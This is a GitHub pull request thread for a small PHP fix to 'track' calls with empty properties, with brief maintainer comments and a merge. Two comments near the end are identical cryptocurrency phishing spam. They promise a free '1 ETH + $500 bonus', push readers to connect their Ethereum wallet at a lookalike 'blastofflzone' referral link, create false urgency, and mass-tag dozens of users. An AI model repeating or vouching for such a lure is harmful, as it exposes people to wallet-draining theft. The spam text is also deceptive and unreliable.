### PR TITLE
Fix 'track' calls not working with empty $properties

### PR DESCRIPTION
**Pull request by kyranb**

### CODE REVIEW

**Comment by kyranb** [comment]
Fixes #4

**Comment by mkarnicki** [comment]
I'm wondering when could we expect a point release with this fix to packagist? Thanks a bunch, have a lovely day :)

**Comment by iagomelanias** [comment]
Sure, i'll merge it.

**Comment by iagomelanias** [comment]
Thank you for your contribution!

**Comment by pisgo** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
pengfei-wang, @jojoe77777, @igamon, @petervidani, @sahajana, @LengYi, @postpascal, @tangkm, @obamakang, @aguaaguaagua, @shaqhub, @dujnan, @saviobosco, @ancitmeong, @pranitbauva1997, @vellengs, @doroo, @corgiflash, @riccardoferrari, @ttanay, @wallisers, @maskott, @elijah-ward, @zachwe, @soulhat, @ASOEstudio, @luohaoyuan, @Rambatino, @qguv, @hpopolis, @fullmated, @mikeghen, @MeaganBlais, @ShuntaShirai, @behoss, @wumansgy, @xianyunyh, @lnky79, @farice, @xsr-thu, @vfranca, @ZhiXuanWang, @marqsm, @lionstepping, @maartenn, @zhujunxi, @murrayn, @jkandzi, @yanweibing, @maskleo

**Comment by stephaneThannio** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
Blcktmct, @hewigovens, @tmangum31, @BluePositive, @alete89, @ghal, @Tarunadityaselva, @crypt0leslie, @oscar2d2, @rturk, @Maxsim3, @ythecombinator, @dolchi21, @m454dk, @carlchang, @ipokkel, @oysterkisses, @jondale, @carlosFattor-Via, @GAEAlimited, @weid, @IvanCharcos, @hlxwell, @albohlabs, @fazlerabbi37, @rpominov, @therainingmonkey, @soben3310, @fitiavana07, @vicken, @keel1982, @HubertLu, @justachamp, @momansoury, @1d0k, @Khym006, @typ0520, @gsilvan, @gazdagruja, @khrtz, @tiberiu-matei, @hhirsch, @petrovicmobi, @zokeber, @Yvson, @mayeaux, @multidude, @lottamus, @Arthurdevid, @felipe-jm

**Pull request merged**
